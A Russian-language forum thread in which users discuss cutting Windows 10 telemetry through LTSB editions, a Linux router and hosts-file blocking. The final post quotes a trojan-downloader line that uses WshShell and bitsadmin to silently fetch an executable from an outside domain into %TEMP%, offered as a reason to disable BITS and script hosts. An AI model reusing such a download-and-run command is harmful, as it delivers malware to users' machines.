Всем привет Прошу не кидать тапками по поводу целесообразности юзания этой оси Итак, вопрос... В винде штатными стредствами выключен весь функционал телеметрии\отчетов и прочего, нештатными выпилено все что можно было выпилить\выключить. И воджеж незадача - в любом приложении, которое юзает сеть, ловятся пакеты к сервакам микрософт( Тоесть как я понимаю, ос инжектит эту пакость в сами процессы. Кто сталкивался с тотальным искоренением сий пакости?
боюсь, не получится (при прямом подрубе к инету) ==>> нужно просеивать ядро и всю сетевую оснастку. 1. попробуй лтсб вынь 10 иль сервачную версию (конечно, полного обруба трои ожидать не стоит, но явно будет легче). 2. обеспечь связь с инетом чрез умный роутер, то бишь комп с линем, тч сможешь резать всю гадость.
О, блин, я совсем забыл как то о лтсб редакции..) А умный роутер - я тоже подумал об этом. но только в качестве тяжелой артиллерии Ясно.. Значит это все глубоко в ядре сидит(((
У меня на 2-м разделе установлена Windows_10_Enterprise_LTSB_x86_x64_RU_Lite_v.6_by_naifle (Ltsb и еще порезанная). "Взвешивая" ее 64бит версию против других Бесяток, получалась меньше на 10к файлов в установленном виде. Я практически с ней не работал, стоит как резервная. Поэтому, по теме, что она отсылает в Сеть, сказать ничего не могу.
Вот, да.. Ну 10к файлов троянского кода - тоже не плохо)) Короче продолжаю параноить и уже скачал лтсб) А вы попробуйте чисто взглянуть на 10 мин - просто огнелис установите и зайдите на любой сайт, и посмотрите, с чем там устанавливаются соединения) И еще... порезанные версии, лайтовые которые, обычно страдают невозможностью добавлением пользователей, что совсем не тру, ибо сидеть под одмином нехорошо
Fail, сложно судить были ли то именно 10 килов трои )) с учётом дубляжа функций, трои может быть много метров. к тому же, всегда имеется много кода двойного применения и агульно выпилить его не удастся ))
Смотреть внизу в FF в плашке "соединение с ..", или что-то из сетевых экранов ставить - и смотреть уже в них? Если "соединение с ..", это режется mvps hosts (127.0.0.0. для различных googleadworks), ну и россыпью из баннерорезок, тут каждому на свой вкус. А вообще Акамаи, имхо, не зарежешь, через него нагрузку распределяют, для всего, не только обновлений/телеметрии. И не только Микрософт. Можно погуглить "akamai technologies левый трафик" - популярный запрос.
https://www.opennet.ru/openforum/vsluhforumID10/5387.html Еще пишут, что к Акамаи присоединяется BITS - служба. Я бы вообще рекомендовал ее запретить, наряду с wscript/cscript, а cmd.exe - переименовать, потому что через нее работают троянские загрузчики. Code (Text): cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False) Да, теперь можно не спать ночью и думать о скрытом пользователе с именем из трех ромбиков :S
